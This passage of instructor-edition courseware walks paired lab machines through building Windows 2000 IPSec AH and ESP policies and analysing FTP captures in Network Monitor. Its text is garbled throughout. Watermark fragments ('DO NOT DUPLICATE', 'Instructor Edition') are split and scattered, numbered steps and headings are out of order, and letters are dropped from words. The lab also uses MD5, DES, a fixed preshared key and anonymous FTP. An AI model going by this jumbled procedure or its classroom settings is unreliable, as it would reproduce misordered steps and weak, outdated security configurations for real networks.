Under Key Exchange Using These Settings, click Advanced. In the Key Exchange Settings dialog box, click Methods. Examine the default settings for the security used in Secure Server (Require Security). Close all windows without changing the properties.
The Rules Tab for the Secure Server (Require Security) Policy
The Rules section of an IPSec policyin this case, the Secure Server (Require Security) policycontains the actual security sections of the policy pertaining to traffic and actions. The IP Filter List is used to dene the types of network traffic that are to be affected by this policy. The predened rules in a policy can be modied, but cannot be removed. The default rules are for All IP Traffic, All ICMP Traffic, and <Dynamic>. In addition to the IP Filter List is the Filter Action. In other words, what does the system do when a match to the rule is found, such as IP Traffic. There are three actions, which are listed as: Permit: Allow unsecured IP packets to pass. Require Security: Requires secured communication. Default Response: Follow the negotiations as initiated by the other computer. This is especially useful when no other rule applies. In fact, it is the only lter action for the Client (Respond Only) predened policy.
or
DO NO
ru ct
In
st
DU
PL
IC
AT
Ed
iti
on
Ed ru ct st In
DO NO T DU PL
In addition to the IP Filter List and the Filter Actions on the Rules tab shown in Figure 2-3, there are other sections that deserve noting. These are the Authentication, Tunnel Setting, and Connection Type options, described in the following section and shown in Figure 2-4. The Authentication Methods are used to dene how a trust will be established between the two communicating hosts. By default, this is the
or
IC
AT
Figure 2-3: The default lter lists and lter actions, as shown on the Require Security Rules tab.
E
87
iti
on
Kerberos method. The other valid options (in addition to Kerberos) are to use a certicate from a Certicate Authority (CA), or to use a predened shared key string. The Tunnel Setting is used to dene if this communication is to use a tunnel, and if so, what the IP address for the end of the tunnel is. The endpoint is the tunnel computer that is closest to the IP traffic destination. The Connection Type is used to dene the types of connections to which the rule will apply. For example, the default setting is All Network Connections. The second option is to have the rule apply only to Local Area Network (LAN) traffic, and the third option is to have the rule only apply to Remote Access traffic.
LAN: (Local Area Network) A computer communications system limited to no more than a few miles and using high-speed connections (2 to 100 megabits per second). A short-haul communications system that connects ADP devices in a building or group of buildings within a few square kilometers, including workstations, frontend processors, controllers, and servers.
Ed or ru ct
TASK 2B-5
1. 2. 3.
st
Examining Policy Rules

Setup: You are logged on to Windows 2000 Server as Administrator. Reopen the ipsec.mmc.msc console. In the right pane, right-click Secure Server (Require Security), and choose Properties. If necessary, select the Rules tab.
88
In
DO
NO
Figure 2-4: The authentication methods, tunnel settings, and connection types, as shown on the Require Security Rules tab.
DU
PL
IC
AT
iti
on
4. 5. 6. 7. 8.
Examine the default settings for IP Filter List, Filter Action, Authentication Methods, Tunnel Setting, and Connection Type. Select the All IP Traffic rule, and click the Edit button. Observe the conguration options that can be adjusted in this section. When you are done reviewing the conguration options, click Cancel twice. Close the ipsec.mmc.msc console, without saving changes.
IPSec AH Implementation
About the Tasks
ru ct
st
In
DO
As a policy maker for a company, youll have to make such decisions before you implement IPSec. These are the actual tools you can use in Windows 2000 to implement your policies.
NO
You will also use the options for conguring policies. You will use just the AH protocol (authenticity/integrity). Then, you will use just the ESP protocol (condentiality). Following that, you will use AH with ESP. Also, ESP will be congured to use its integrity algorithm. Finally, because the integrity algorithms can be implemented in two avors (SHA-1 or MD5) and the encryption algorithms for condentiality can also be implemented in two avors (DES or 3DES), youll use combinations of these.
DU
PL
Student_P will initiate communications with Student_Q. Student_Q will dictate whether it has an IPSec policy enabled. If so, it then determines if it should request or require Student_P to do the same. On Student_P, at rst you will have no IPSec Respond policy activated, but later you will have a Respond policy. You will capture traffic between these two computers using Network Monitor, and perform an analysis on the traffic.
or
IC
AT
For the following tasks, you will work in pairs. The text and activities refer to the two machines as Student_P and Student_Q. These machines are connected to the classroom hub as well as to each other via a crossover cable. You will disable the interfaces that are connected to the classroom hub and enable the interfaces that are connected to each other. This way, you can isolate each pair of machines into their own little networks and not interfere with other student pairs.
Ed
You now have all of the information and tools you need to be able to implement IPSec. Lets try it out.
E
89
iti
Topic 2C
on
TASK 2C-1
Preparing the System Setup and Configuration
Note:Perform this task on all student machines. 1. 2. 3.
If you are unsure about the classroom conguration, check with your instructor.
Open the Network And Dial-up Connections Control Panel. Disable the Classroom Hub interface.
Verify that the Partner interface is enabled.
4.
Verify your IP addresses. Generally, if the IP address of the interface connected to the classroom hub is 172.16.10.x or 172.18.10.x, then the IP address of the interface connected via the crossover cable to your partners machine will be 172.26.10.x or 172.28.10.x. Verify connectivity by pinging your partners IP address. Both student machines should be able to ping each other successfully. Close all open windows.
5. 6.
or
DO NO
ru ct
In
st
DU
PL
IC
In the previous topic, you examined the default IPSec policies in Windows 2000. For the remainder of the lesson, you will create and use your own customized IPSec policies. This will enable you to fully create and secure network traffic based on your unique conguration requirements. The following gures can be used as a reference while performing the tasks of this section.
AT
Creating Custom IPSec Policies
Ed
iti
on
Ed
Figure 2-5: Opting not to use the Add Wizard. When you are creating a new policy, you will need to add and congure all the options you previously examined. In these tasks, you will be customizing the policies, one by one, and do not want to use the Add Wizard, because the Add Wizard will walk you through specic predened steps. At this stage, you want to perform everything manually.
or
DO NO
ru ct In st
T
DU
PL
IC
AT
E
91
iti
on
Ed or
DO NO
ru ct
In
st
DU
PL
During policy creation, you will be presented with the Security Methods tab. At this stage, you will see ve columns presented: Type, AH Integrity, ESP Condentiality, ESP Integrity, and Key Lifetimes (KB/Sec), but you might need to scroll to see all ve.
IC
AT
Figure 2-6: The Security Methods tab, showing the leftmost part of the Security Method Preference Order.
iti
on
Ed ru ct
Creating the 1_REQUEST_AH(md5)_only Policy
Note:Perform this task only if you are designated as Student_Q.
st
1. 2. 3. 4. 5.
Open the ipsec.mmc.msc console.
In
In the right pane, right-click and choose Create IP Security Policy, then click Next.
For the IP Security Policy Name, enter 1_REQUEST_AH(md5)_only, and click Next. Uncheck Activate The Default Response Rule, and click Next. Uncheck Edit Properties, and click Finish.
Lesson 2: Implementing IPSec 93
DO
NO
TASK 2C-2
DU
Security methods are listed in order of preference that this machine will use when attempting to negotiate IP Security when dealing with another machine that responds that it can use IPSec, too. You can add, edit, or remove any of these methods. In this case, since you will have named this policy 1_REQUEST_ AH(md5)_only, you will simplify the list and offer exactly one choice: Request IP Security that relies only on AH Integrity using the MD5 hashing algorithm. Do not worry about key lifetimes at this stage.
or
PL
IC
AT
Figure 2-7: The Security Methods tab, showing the rightmost part of the Security Method Preference Order.
iti
on
6. 7. 8. 9.
Double-click the new policy 1_REQUEST_AH(md5)_only. On the Rules tab, uncheck Use Add Wizard, and click Add. On the IP Filter List tab, click the radio button for All IP Traffic.
10. Click the radio button for Request Security (Optional). 11. Click Edit.
12. Verify that the radio button for Negotiate Security is selected.
13. Read the options presented to you under Security Method Preference Order. 14. Remove all but one Security Method by holding down the Shift key, selecting all but one of the choices, and clicking Remove. 15. When prompted with Are You Sure?, click Yes. 16. Select the remaining method, and click Edit. 17. Under Security Method, click the Settings button found under Custom (For Expert Users)as youre on your way to becoming an expert on IPSec.
Ed
T DU
19. If necessary, uncheck ESP.
or
DO NO
18. Verify that AH is checked and that the integrity algorithm is MD5.
20. Under Session Key Settings, uncheck both check boxes.
In
94
st
ru ct
21. Click OK three times to return to the New Rule Properties dialog box. 22. Leave the New Rule Properties open for the next task.
PL
IC
AT
iti
on
Switch to the Filter Action tab.
Editing Authentication Method Policies

When you are creating this customized policy, you are going to use only AH, and not ESP. So, when you are customizing the settings, be sure to uncheck the ESP options and to check the AH options. You should also clear the check boxes for generating new keys, both for size (Kbytes) and time (seconds).
Ed or
DO NO T
Notice that three authentication methods are supported: Kerberos, Certicates, and Preshared Keys. You will use the third method, as it is simple to implement, for now. In a production environment, if you have a homogenous Windows 2000 domain implementation, you could leave it at the default Kerberos; in a heterogeneous network, you could choose to set up a CA and distribute IPSec certicates.
ru ct
TASK 2C-3
2. 3. 4.
In
1.
Verify that the New Rule Properties are displayed. Select the Authentication Methods tab. Click Edit.
Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide text for the preshared key.
st
Editing the 1_REQUEST_AH(md5)_only Policy
DU
PL
Figure 2-8: The Authentication Method tab.
IC
AT
iti
on
Click OK to close the Edit Authentication Methods Properties dialog box. 5. 6. 7. Switch to the Tunnel Setting tab, but leave the settings alone. You will be working in Transport Mode only. Switch to the Connection Type tab, but leave the settings alone. You will use the default of All Network Connections. Click Close to close the Rule Properties. Keep the Policy Properties open for the next task.
Ed
T DU
You have just congured a policy where Student_Q will request any other computers that attempt to communicate with it to implement AH by using the MD5 algorithm. Lets assume that this policy is put into effect, and another computer says that it can communicate with Student_Q by using AH, as well. Student_Q should be in a position to respond to this. Therefore, you should now congure the Default Response rule in this policy for Student_Q.
or st
Figure 2-9: Preparing to modify the default response. To modify the rule, you will not use the Add Wizard. Once you click Edit, you will again be presented with the tabs for Security Methods, Authentication Methods, and Connection Types.
In
DO
ru ct
NO
PL
IC
AT
iti
Setting Up the Computers Response
on
Ed
Figure 2-10: Editing Security Methods. Under Security Methods, you will again see ve columns presented: Type, AH Integrity, ESP Condentiality, ESP Integrity, and Key Lifetimes (KB/Sec). As before, you can add, edit, or remove any of these methods.
or
DO NO
ru ct
Configuring the Policy Response
1. 2. 3. 4.
Verify that the properties for the 1_REQUEST_AH(md5)_only policy are displayed.
In
On the Rules tab, check <Dynamic> Default Response, and click Edit. (The Use Add Wizard check box should remain unchecked.) Remove all but one Security Method by holding down the Shift key, selecting all but one of the choices, and clicking Remove. When prompted with Are You Sure?, click Yes.
st
T
TASK 2C-4
DU
In this case, this policy is named 1_REQUEST_AH(md5)_only, but because it will also have to respond to the request it made, youll simplify the list and offer exactly one choice: Respond to IP Security that relies only on AH integrity using the MD5 hashing algorithm. As before, you dont need to worry about the key lifetimes.
PL
IC
AT
E
97
iti
on
5. 6. 7. 8. 9.
Select the remaining method, and click Edit. Under Security Method, click the Settings button found under Custom (For Expert Users). Verify that the box beside AH is checked and that the integrity algorithm is MD5. Verify that ESP is unchecked.
Under Session Key Settings, verify that the options for generating new keys for both size and time are unchecked.
11. Switch to the Authentication Methods tab. 12. Click Edit.
13. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key. 14. Click OK.
16. Click OK, and then click Close.
or
DO NO
17. Close the ipsec.mmc.msc console, without saving changes.
ru ct
TASK 2C-5
Configuring AH in Both Directions
In
98
st
Configuring the Second Computer

Note:Perform this task only if you are designated as Student_P. 1. Open the ipsec.mmc.msc console. In the right pane, right-click and choose Create IP Security Policy. Click Next. For the IP Security Policy Name, enter 1_RESPOND_AH(md5)_only, and click Next. Uncheck Activate The Default Response Rule, and click Next.
2. 3.
You have congured a policy where Student_Q will request other computers that attempt to communicate with it to implement AH by using the MD5 algorithm; Student_Q is also in a position to respond by using this algorithm. Now, lets congure Student_P to follow Student_Qs lead.
DU
PL
IC
AT
15. Switch to the Connection Type tab, and verify that the setting is the default of All Network Connections.
Ed
iti
10. Click OK twice to return to the Edit Rule Properties.
on
4. 5. 6. 7. 8. 9.
Uncheck Edit Properties, and click Finish. Double-click the new policy 1_RESPOND_AH(md5)_only. On the Rules tab, uncheck Use Add Wizard, check <Dynamic> Default Response, and click Edit. Remove all choices but one by holding down the Shift key, selecting all but one of the choices, and clicking Remove. When prompted with Are You Sure?, click Yes. Select the remaining method, and click Edit.
10. Under Security Method, click the Settings button found under Custom (For Expert Users). 11. Verify that AH is checked and that the integrity algorithm is MD5. 12. Verify that ESP is unchecked.
13. Under Session Key Settings, verify that the boxes for generating new keys for both time and size are unchecked. 14. Click OK twice to return to the Rule Properties. 15. Switch to the Authentication Methods tab. 16. Click Edit.
Ed
T DU PL IC
17. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key. 18. Click OK.
19. Switch to the Connection Type tab, and verify that the default setting of All Network Connections is selected. 20. Click OK, and then click Close to nish the creation of the policy. 21. Close the ipsec.mmc.msc console, without saving changes.
Now that IPSec policies are congured on two machines, you need to test the policies to ensure that they work as you intended them to work. To do this, youll bring up an FTP site on Student_Q and attempt to access this FTP site from Student_P. Youll do this with IPSec implemented on one machine and then on the other. Youll run Network Monitor to capture and record traffic between the two machines. Youll examine these captures and see where (in the packet) the IPSec headers reside. For greater clarity, we can verify this with the RFCs associated with IPSec, as well.
In
DO
Configuring FTP
st
ru ct
NO
or
AT
E
99
iti
on
TASK 2C-6
Setting Up the FTP Process
Note:Perform step 1 through step 6 only if you are designated as Student_Q. 1. 2. From the Start menu, choose ProgramsAdministrative ToolsInternet Services Manager. In the left pane, click your ftp servers name. Verify that your default FTP site is running. Verify its properties, and nd out where the home directory is physically located. The default home directory is the \inetpub\ ftproot folder. Close Internet Services Manager.
3. 4. 5. 6.
In this folder, create a text document. Edit this document to input some text and save it as text1.txt. Create and save three more similar text documents in the same folder. Use text2.txt, text3.txt, and text4.txt as the le names.
Ed
T DU
In Explorer, locate and navigate to the folder designated as the FTP home directory.
or
DO NO
7. 8. 9.
Open a command prompt.
100
In
st
ru ct
Log on as anonymous with no password.
10. Verify that you can access the text documents created on the Student_Q computer, by using the DIR command. 11. Once you have veried that you can access the text documents, quit the ftp session by entering bye at the ftp prompt. 12. Leave this command prompt open.
Implementing the IPSec Policy

You have just tested a plain text ftp session. The following tasks will walk you through the process of implementing IPSec, and testing the results in both directions. First, you will prove that you can connect, even though IPSec is implemented on only one of the hosts.
PL
Enter ftp IP_address_of_Student_Q to ftp to Student_Qs FTP site.
IC
AT
Note: Perform step 7 through step 12 only if you are designated as Student_P.
iti
on
TASK 2C-7
Implementing the 1_REQUEST_AH(md5)_only Policy
Note:Perform step 1 through step 4 only if you are designated as Student_Q. 1. 2. 3. 4. Open your ipsec.mmc.msc console. Right-click the 1_REQUEST_ AH(md5)_only policy and choose Assign. Close the ipsec.mmc.msc console. If you are prompted to save changes, click No. Start Network Monitor, and verify that it is going to collect packets from the interface connected to Student_P.
Start a new capture, and allow Network Monitor to capture packets until Student_P has completed step 5 through step 9.
Note: Perform step 5 through step 9 only if you are designated as Student_P. 5.
At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q after a very brief delay, even though an IPSec policy is assigned on Student_Q. Log on as anonymous with no password. Enter dir to see a list of les hosted on the ftp site. Exit the ftp session. Leave the command prompt open.
Ed
T DU PL IC
7. 8. 9.
Request-only Session Analysis
st
In
DO
NO
Why was your attempt successful? What is the reason for the brief delay? This is because the policy is designed to request onlynot demandIPSec. If the remote machine trying to communicate with Student_Q is not IPSec-aware or does not have a policy assigned to do so, then Student_Q will fall back to regular, insecure IP. The brief delay occurred because Student_Q was trying to establish an IPSec communication with Student_P.
ru ct
or
AT
6.
E
101
iti
on
You will be using Network Monitor repeatedly throughout this course, so you might want to create a shortcut for it on the Windows Desktop.
TASK 2C-8
Analyzing the Request-only Session
Note:Perform this task only if you are designated as Student_Q. 1. 2. In Network Monitor, stop and view the capture.
3.
For this step, and subsequent steps that deal with the ISAKMP protocol, your classroom conguration might not yield the expected results, due to timing issues as the students complete their assigned steps. You can have them try to restart the computer, and then try redoing the activity.
4.
Close Network Monitor. You can save your capture to a le, if you like.
Ed
T DU
In frame 4, observe that the protocol is ISAKMP (UDP port 500). When it does not hear from Student_P, it tries again approximately a second later. When it does not hear from Student_P again, it falls back to insecure communication, and the three-way handshake proceeds as before (in frames 6, 7, and 8). Once the connection is made, the session is established in clear text, with no IPSec. You are able to see the payload and full headers of all the packets, with no evidence of IPSec.
st
Then, wait until Student_Q performs the next step. Note: Perform step 2 only if you are designated as Student_Q.
In
2.
Activate Network Monitor, and start a capture. Note: Perform the rest of this task only if you are designated as Student_P.
102
DO
ru ct
TASK 2C-9
1.
Configuring a Request-and-Respond IPSec Session

Note:Perform step 1 only if you are designated as Student_P. Open your ipsec.mmc.msc console. Right-click the 1_RESPOND_ AH(md5)_only policy, and choose Assign. Close the ipsec.mmc.msc console, without saving changes.
NO
PL
In the previous task, you were able to see that even though you had IPSec enabled in one direction, the policy allowed for unsecured communication. When Student_P responded with no IPSec, Student_Q went ahead and accepted the session, and traffic continued without IPSec. In the next task, you will congure Student_P to respond to Student_Qs IPSec policy.
or
Implementing a Request-and-Respond Policy
IC
AT
iti
Observe that, after the ARP resolution has taken place (in frames 1 and 2), Student_P attempts to initiate a three-way handshake with Student_Q (in frame 3). Because the policy on Student_Q says to request IPSec communication, Student_Q begins the negotiation process (in frame 4).
on
3. 4. 5. 6. 7.
At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q. Log on as anonymous with no password. Enter dir to see a list of les hosted on the ftp site. Exit the ftp session. Close the command prompt.
Some things to look for during this analysis include: IP identies AH with a protocol ID of 0x33 (51). AH identies TCP with a Next Header of 0x6 (6).
Ed
T DU PL IC
In the second attempt at communication, the temporary delay that was visible in the earlier task was not present. This is due to the fact that the second host was now able to respond to the IPSec request initiated by the ftp server. There was no need to move down the list to a different method of communication, thus saving a bit of time. In the following task, you will use Network Monitor to analyze this session, and to see how the IPSec policy was implemented.
TCP identies FTP with a destination port of 0x15 (21).
TASK 2C-10
Analyzing the Request-and-Respond Session
Note:Perform this task only if you are designated as Student_Q. Student_P is advised to follow along. 1. 2. In Network Monitor, stop and view the capture.
3.
st
4.
5. 6.
In
Observe that, when Student_P agrees to comply with the IPSec request (in frame 5), there is an ISAKMP interplay between the two machines for the next few frames to negotiate and establish the IPSec protocol. Observe that the actual three-way handshake is now completed in frames 14 and 15. Observe that, from frame 16 onward until the session teardown, the AH ensures integrity of communication between the two machines.
DO
Observe that, because the policy on Student_Q says to request IPSec communication, Student_Q begins the negotiation process (in frame 4) by using the ISAKMP protocol (UDP port 500).
NO
Observe that, after the ARP resolution has taken place (in frames 1 and 2), Student_P attempts to initiate a three-way handshake with Student_Q (in frame 3).
ru ct
or
AT
E
103
iti
Request-and-Respond Session Analysis
on
7. 8.
Double-click a frame whose protocol is identied by Network Monitor as FTP. Observe the sequence of protocol identication: Ethernet, then IP, then AH, then TCP, then FTP. As noted earlier: Ethernet identies the protocol IP with an Ethertype of 0x800. IP identies AH with a protocol ID of 0x33 (51). AH identies TCP with a Next Header of 0x6 (6).
TCP identies FTP with a destination port of 0x15 (21).
9.
10. In fact, look around frame 33. Near there, you should be able to see the name of the text le in response to the dir (LIST) command.
Implementing a Require IPSec Policy

Now lets modify the situation a bit. You will congure Student_Q to demand IPSec of other computers. You will use the Require policy instead of the Request policy. From Student_P, you will attempt to communicate with Student_Q and fail. Then you will reassign the Respond policy on Student_P so that you will be able to re-establish communications with Student_Q.
Ed
T DU
11. Close Network Monitor. You can save your capture to a le if you like.
or
DO NO
In
104
st
ru ct
1. 2. 3. 4. 5. 6.
Implementing the 2_REQUIRE_AH(md5)_only Policy

Note:Perform the following step only if you are designated as Student_P. Open your ipsec.mmc.msc console. Right-click the 1_RESPOND_ AH(md5)_only policy, and choose Un-assign. Then close the ipsec.mmc. msc console. Note: Perform the rest of this task only if you are designated as Student_Q.
Open your ipsec.mmc.msc console. Right-click the 1_REQUEST_ AH(md5)_only policy, and choose Un-assign. In the right pane, right-click and choose Create IP Security Policy, then click Next.
For the IP Security Policy Name, enter 2_REQUIRE_AH(md5)_only, and click Next. Uncheck Activate The Default Response Rule, and click Next. Uncheck Edit Properties, and click Finish.
PL
TASK 2C-11
IC
AT
iti
Observe that there is no encryptionthe AH only signs the packet; it does not encrypt it.
on
7. 8. 9.
Double-click the new policy. On the Rules tab, uncheck Use Add Wizard if its checked, and click Add. On the IP Filter List tab, click the radio button for All IP Traffic.
10. Switch to the Filter Action tab. 11. Click the radio button for Require Security. 12. Click the Edit button. 13. Leave the radio button selected for Negotiate Security.
14. Remove all but one method by holding down the Shift key, selecting all but one of the choices, and clicking Remove. 15. When prompted with Are You Sure?, click Yes. 16. Select the remaining method, and click Edit.
17. Under Security Method, click the Settings button found under Custom (For Expert Users). 18. Verify that AH is checked and that the integrity algorithm is MD5.
Ed
T DU PL IC
20. Under the Session Key settings, uncheck the two boxes for generating new keys for time and size. 21. Click OK. If you see an information box indicating that you are on a Medium security level, click OK to agree to it. 22. Click OK twice.
25. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.
st
26. Click OK to close the Edit Authentication Method Properties dialog box. 27. Click Close twice to close the Rule Properties.
Mismatched AH Implementation
You have congured a policy where Student_Q will require other computers that attempt to communicate with it to implement AH by using the MD5 algorithm; Student_Q also will respond only by using this algorithm. Lets see what happens when Student_P does not follow Student_Qs lead.
In
DO
ru ct
NO
or
19. Verify that ESP is unchecked.
AT
E
105
iti
on
TASK 2C-12
Attempting to Use Different IPSec Policies
Note:Perform step 1 through step 3 only if you are designated as Student_Q. 1. 2. In your ipsec.mmc.msc console, right-click the 2_REQUIRE_AH(md5)_ only policy and choose Assign. Activate Network Monitor, and make sure that it is going to collect packets from the interface connected to Student_P. This is the Partner interface. Allow Network Monitor to capture packets until Student_P has nished the rest of the task. Note: Perform the rest of this task only if you are designated as Student_P. 4. 5. At a command prompt, again enter ftp IP_address_of_Student_Q. After a substantial delay, observe that you cannot ftp to Student_Q. In fact, you should receive a message indicating that the connection has timed out.
3.
Ed
T DU
st
Note:Perform this task only if you are designated as Student_Q. Student_P is advised to follow along. 1. 2. In Network Monitor, stop and view the capture. Observe that, after the ARP resolution has taken place (in frames 1 and 2), Student_P attempts to initiate a three-way handshake with Student_Q (in frame 3).
106
In
DO
ru ct
TASK 2C-13
Why was your attempt unsuccessful? What is the reason for the substantial delay? This is because Student_Qs policy is designed to demand IPSec. If a remote machine trying to communicate with Student_Q is not IPSec-aware or does not have a policy assigned to do so, then Student_Q will not fall back to regular, insecure IP. The substantial delay occurred because Student_Q was trying to establish an IPSec communication with Student_P.
Analyzing a Mismatched IPSec Policy Session
NO
PL
IC
Mismatched IPSec Session Analysis
or
AT
6.
Enter quit to stop the ftp attempt.
iti
on
3.
4.
Close Network Monitor. You can save your capture to a le if you like.
TASK 2C-14
ru ct
Note: Perform the following step only if you are designated as Student_Q. 2. Start Network Monitor, and start a capture as soon as Student_P enables the IPSec policy, but before Student_P attempts to ftp. Note: Perform step 3 through step 6 only if you are designated as Student_P.
st
3. 4. 5. 6.
At the command prompt, again enter ftp IP_address_of_Student_Q. Log on as anonymous with no password. You should be able to successfully ftp to Student_Q.
7.
In
Enter dir to see a list of les hosted on the ftp site. Exit the ftp session, and close the command prompt. Note: Perform the rest of this task only if you are designated as Student_Q.
DO
NO
DU
PL
1.
Open your ipsec.mmc.msc console. Right-click the 1_RESPOND_ AH(md5)_only policy and choose Assign. Then close the ipsec.mmc.msc console.
IC
Note:Perform the following step only if you are designated as Student_P.
or
AT
Implementing and Analyzing a Require IPSec Policy Session
Ed
Clearly, in order for Student_P to communicate, it must use an appropriate IPSec policy. Now, you will congure Student_P to respond to Student_Qs IPSec policy. Once you have enabled the policy, you will capture and analyze the IPSec traffic in Network Monitor.
E
107
iti
Implementing and Analyzing the Require Response Policy
on
Observe that, because the policy on Student_Q says to require IPSec communication, Student_Q begins the negotiation process (in frame 4) with the ISAKMP protocol. When it does not hear from Student_P, approximately a second later, it tries again. Student_P, meanwhile, keeps knocking on Student_Qs door with a SYN packet, as it has no idea how to respond to the ISAKMP exchange. Student_Q keeps plugging away with ISAKMP because its policy will allow it to proceed only after ISAKMP negotiations have been successful.
8.
Observe that these captures are exactly the same as when the 1_REQUEST_AH(md5)_only policy was in force earlier in this topic. There is no difference with respect to the negotiation process, there is no difference with respect to the three-way handshake, and so forth. Close Network Monitor. You can save your capture to a le if you like.
9.
Topic 2D
IPSec ESP Implementation
Implementing a Request ESP IPSec Policy
ru ct
1. 2. 3. 4. 5. 6. 7. 8. 9.
If necessary, open your ipsec.mmc.msc console. In the right pane, rightclick and choose Create IP Security Policy. Click Next.
Uncheck Activate The Default Response Rule, and click Next. Uncheck Edit Properties, and click Finish. Double-click the new policy. On the Rules tab, verify that Use Add Wizard is unchecked, and click Add. On the IP Filter List tab, click the radio button for All IP Traffic. Switch to the Filter Action tab. Click the radio button for Request Security (Optional).
st
In
DO
NO
For the IP Security Policy Name, enter 3_REQUEST_ESP(des)_only, and click Next.
DU
Note:Perform this task only if you are designated as Student_Q. Student_P is advised to follow along.
PL
Creating the 3_REQUEST_ESP(des)_only IPSec Policy
IC
TASK 2D-1
or
AT
Lets start our investigation of ESP encryption by creating a Request policy. The tools and the basic procedure are the same as you used to implement AH Request policies, just some of the options you select will be slightly different.
Ed
In the previous topic, you examined the AH implementation in Windows 2000. You implemented the different types of AH, and analyzed the communication in Network Monitor. In this topic, you will see how to congure a computer to use the encryption provided with ESP, and compare the implementation options of this form of IPSec to the AH implementations.
iti
on
10. Click Edit. 11. Leave the radio button selected for Negotiate Security. 12. Read the options presented to you under Security Method Preference Order. 13. Remove all but one security method by holding the Shift key, selecting all but one of the choices, and clicking Remove. There might be only one option in some cases, based on your current OS conguration. If so, skip the next step. 14. When prompted with Are You Sure?, click Yes. 15. Select the remaining method, and click Edit.
16. Under Security Method, click the Settings button found under Custom (For Expert Users). 17. Verify that AH is unchecked. 18. Verify that ESP is checked. 19. Leave ESPs integrity algorithm set to <None>. 20. For Encryption Algorithm, select DES.
Ed
NO T DU PL IC
22. Click OK three times to return to the New Rule Properties. 23. Switch to the Authentication Methods tab. 24. Click Edit.
25. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key. 26. Click OK, and then click Close to return to the Policy Properties. 27. On the Rules tab, check <Dynamic> Default Response, and verify that the Use Add Wizard check box is unchecked. Click Edit.
st
28. Under Security Methods, remove all but one of the methods. 29. When prompted with Are You Sure?, click Yes.
31. Under Security Method, click the Settings button found under Custom (For Expert Users). 32. Verify that AH is unchecked. 33. Verify that ESP is checked.
In
30. Select the remaining method, and click Edit.
DO
ru ct
or
21. Under the Session Key settings, verify that the boxes for generating new keys for both time and size are unchecked.
AT
iti
on
34. Verify that ESPs integrity algorithm is set to <None>. 35. For ESPs encryption, select DES. 36. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked. 37. Click OK twice to return to the Rule Properties. 38. Switch to the Authentication Methods tab. 39. Click Edit.
41. Click OK twice, and then click Close to exit from the Policy Properties. 42. Close the ipsec.mmc.msc, without saving settings.
Configuring the ESP IPSec Response

You have congured a policy wherein Student_Q will request other computers that attempt to communicate with it to implement ESP by using the DES encryption algorithm; Student_Q is also in a position to respond by using this algorithm. If communication were attempted at this point, the two hosts would not be able to send data to one another. The second host, Student_P in this case, must be congured to communicate using ESP as well.
Ed
T DU
or
DO NO
In
110
st
ru ct
TASK 2D-2
1. 2. 3.
During the creation of this policy, you will see ve columns presented as Security Methods: Type, AH Integrity, ESP Condentiality, ESP Integrity, and Key Lifetimes (KB/Sec). Because you will have named this policy 3_RESPOND_ ESP(des)_only, youll simplify the list and offer exactly one choice, as you did in the other rules. In this case, you are creating a rule so that the host will respond to requests for IP Security that rely only on ESP condentiality by using the DES encryption algorithm.
Creating the 3_RESPOND_ESP(des)_only IPSec Policy

Note:Perform this task only if you are designated as Student_P. Student_Q is advised to follow along. Open your ipsec.mmc.msc console. In the right pane, unassign the 1_RESPOND_AH(md5)_only policy. Create another IP Security Policy. Click Next.
For the IP Security Policy Name, enter 3_RESPOND_ESP(des)_only, and click Next. Uncheck Activate The Default Response Rule, and click Next.
PL
IC
AT
iti
on
4. 5. 6. 7. 8. 9.
Uncheck Edit Properties, and click Finish. Double-click the new policy. On the Rules tab, verify that Use Add Wizard is unchecked, check <Dynamic> Default Response, and click Edit. Remove all but one Security Method by holding the Shift key, selecting all but one of the choices, and clicking Remove. When prompted with Are You Sure?, click Yes. Select the remaining method, and click Edit.
10. Under Security Method, click the Settings button found under Custom (For Expert Users). 11. Verify that AH is unchecked. 12. Verify that ESP is checked.
13. Verify that ESPs integrity algorithm is set to <None>. 14. For Encryption Algorithm, select DES.
16. Click OK twice to return to the Rule Properties. 17. Switch to the Authentication Methods tab. 18. Click Edit.
or
DO NO T
20. Click OK twice, and then click Close to end the creation of the policy. 21. Close the ipsec.mmc.msc without saving settings.
In
Now that you have two hosts each congured with an ESP IPSec policy, you will enable those policies. You will then initiate network traffic, and analyze the traffic in Network Monitor. During the analysis stage, keep in mind the differences you see between the ESP implementation and what you saw in the AH implementation.
st
ESP Request-and-Response Session Analysis
DU
ru ct
PL
IC
AT
15. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.
Ed
E
111
iti
on
TASK 2D-3
Enabling IPSec ESP Policies
Note:Perform step 1 through step 2 only if you are designated as Student_Q.
2.
Start Network Monitor, make sure that it is going to collect packets from the interface connected to Student_P, and start a capture. Note: Perform step 3 through step 7 only if you are designated as Student_P.
Ed
T DU
1.
Open your ipsec.mmc.msc console. Right-click the 3_REQUEST_ ESP(des)_only policy and choose Assign. Assigning this policy automatically unassigns the policy that was in effect.
3. 4. 5.
At a command prompt, again enter ftp IP_address_of_Student_Q.
st
In
10. Observe that in frame 4, the protocol is ISAKMP (UDP port 500). When it does not hear from Student_P, it tries again approximately a second later. When it does not hear from Student_P again, it falls back to insecure communication, and the three-way handshake proceeds as before (in frames 6, 7, and 8). 11. Close Network Monitor. You can save your capture to a le if you like.
112
DO
ru ct
6. 7. Exit the ftp session. 8. 9.
Enter dir to see a list of les hosted on the ftp site.
Note: Perform the rest of this task only if you are designated as Student_Q.
In Network Monitor, stop and view the capture. Observe that, after the ARP resolution has taken place (in frames 1 and 2), Student_P attempts to initiate a three-way handshake with Student_Q (in frame 3). Because the policy on Student_Q says to request IPSec communication, Student_Q begins the negotiation process (in frame 4).
NO
PL
IC
Observe that you can successfully ftp to Student_Q after a very brief delay, even though an IPSec policy is assigned on Student_Q.
or
AT
iti
on
